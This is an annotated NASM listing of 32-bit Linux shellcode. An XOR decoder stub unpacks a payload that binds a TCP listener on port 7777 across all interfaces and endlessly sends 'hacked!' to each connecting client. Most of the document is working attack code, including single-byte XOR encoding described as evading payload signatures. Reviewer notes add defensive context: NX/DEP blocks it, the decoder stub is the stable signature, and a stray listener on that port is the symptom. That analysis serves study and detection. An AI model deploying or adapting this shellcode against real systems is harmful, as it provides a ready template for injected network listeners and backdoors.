;
; Shellcode that binds to TCP port 7777 and returns the string "hacked!" to those who
; connect to it.
;
; Coded by Arne Vidstrom, http://ntsecurity.nu, http://vidstrom.net
;
; Reviewer notes
;   Syntax/target : NASM, 32-bit x86. Every system call is made with int 0x80;
;                   eax = 0x66 with a sub-call number in ebx and a pointer to
;                   an argument array in ecx matches the Linux i386
;                   socketcall interface (syscall 102).
;   Layout        : a jmp/call/pop stub obtains its own address, XORs the
;                   following 172 bytes in place with 0x22 and then runs them.
;                   This listing shows that payload in its decoded form.
;   Behaviour     : socket -> bind (port 7777, address 0) -> listen, then an
;                   endless loop of accept -> send "hacked!" -> close.
;                   No system call result is checked for an error.
;   For defenders : - The decoder writes to the same bytes it executes next,
;                     so it only runs from memory that is both writable and
;                     executable; NX/DEP or W^X mappings stop it.
;                   - Signatures built from the readable payload below will
;                     not match the XOR-encoded bytes; the decoder stub is
;                     the part that stays constant.
;                   - The run-time effect is a TCP listener on port 7777 bound
;                     to every interface, owned by the process the code runs
;                     in. An unexpected listener on that port is the symptom
;                     to look for.
;

BITS 32

; Decode the shellcode
;
; jmp/call/pop: "call second" pushes the address of the instruction after it
; (the label "after"), and "pop eax" picks that address up, so the code needs
; no fixed load address.

        jmp     short first             ; reach the call below
second:
        pop     eax                     ; eax = address of "after" (start of payload)
        xor     ecx, ecx
        mov     cl, 172                 ; ecx = 172 = number of bytes to decode
                                        ; NOTE(review): presumably the assembled size
                                        ; of everything after "after:"; the listing
                                        ; does not show how the value was derived
nextone:
        xor     byte [eax], 022h        ; decode one byte in place, single-byte key 0x22
        inc     eax
        loop    nextone                 ; ecx -= 1, repeat while ecx != 0
        jmp     short after             ; run the decoded payload
first:
        call    second                  ; pushes the address of "after"
after:

        ; Call socket()
        ; Argument array on the stack: (2, 1, 6), which on Linux is
        ; (AF_INET, SOCK_STREAM, IPPROTO_TCP).

        mov     eax, 6
        push    eax                     ; protocol = 6
        mov     eax, 1
        push    eax                     ; type = 1
        mov     eax, 2
        push    eax                     ; domain = 2
        mov     ecx, esp                ; ecx -> argument array
        mov     ebx, 1                  ; socketcall sub-call 1 = socket
        mov     eax, 0x66               ; syscall 0x66 (102) = socketcall
        int     0x80
        mov     esi, eax                ; esi = listening socket (result not checked)

        ; Call bind()
        ; Builds a 16-byte sockaddr_in on the stack. In memory the first dword
        ; is 02 00 1e 61: family = 2 (AF_INET), port = 0x1e61 = 7777 in network
        ; byte order. The three zero dwords are the address (0 = all
        ; interfaces) and the 8 padding bytes.

        xor     eax, eax
        push    eax                     ; padding
        push    eax                     ; padding
        push    eax                     ; sin_addr = 0
        push    dword 0x611e0002        ; sin_port = 7777, sin_family = 2
        mov     edx, esp                ; edx -> sockaddr_in
        mov     eax, 16
        push    eax                     ; addrlen = 16
        push    edx                     ; addr
        push    esi                     ; sockfd
        mov     ecx, esp                ; ecx -> argument array
        mov     ebx, 2                  ; socketcall sub-call 2 = bind
        mov     eax, 0x66
        int     0x80                    ; result not checked

        ; Call listen()

        mov     eax, 5
        push    eax                     ; backlog = 5
        push    esi                     ; sockfd
        mov     ecx, esp                ; ecx -> argument array
        mov     ebx, 4                  ; socketcall sub-call 4 = listen
        mov     eax, 0x66
        int     0x80                    ; result not checked

socket_loop:

        ; Call accept()
        ; Reserves 16 bytes for the peer address and a dword holding its
        ; length, then passes pointers to both. Nothing pushed inside the
        ; loop is popped again, so esp moves down on every iteration.

        sub     esp, 16                 ; buffer for the peer sockaddr
        mov     eax, esp                ; eax -> peer sockaddr buffer
        mov     ebx, 16
        push    ebx                     ; addrlen value = 16
        mov     ebx, esp                ; ebx -> addrlen
        push    ebx                     ; &addrlen
        push    eax                     ; addr
        push    esi                     ; listening socket
        mov     ecx, esp                ; ecx -> argument array
        mov     ebx, 5                  ; socketcall sub-call 5 = accept
        mov     eax, 0x66
        int     0x80
        mov     edi, eax                ; edi = connected socket (result not checked)

        ; Call send()
        ; The two dwords are the bytes "hack" and "ed!\0" once stored
        ; little-endian, so esp points at the string "hacked!".

        push    dword 0x00216465        ; "ed!" followed by a NUL byte
        push    dword 0x6b636168        ; "hack"
        mov     eax, esp                ; eax -> "hacked!"
        xor     ebx, ebx
        push    ebx                     ; flags = 0
        mov     ebx, 7
        push    ebx                     ; length = 7 (the NUL is not sent)
        push    eax                     ; buffer
        push    edi                     ; connected socket
        mov     ecx, esp                ; ecx -> argument array
        mov     ebx, 9                  ; socketcall sub-call 9 = send
        mov     eax, 0x66
        int     0x80                    ; result not checked

        ; Call close()

        mov     ebx, edi                ; fd = connected socket
        mov     eax, 0x6                ; syscall 6 = close
        int     0x80
        jmp     socket_loop             ; wait for the next connection; there is no exit path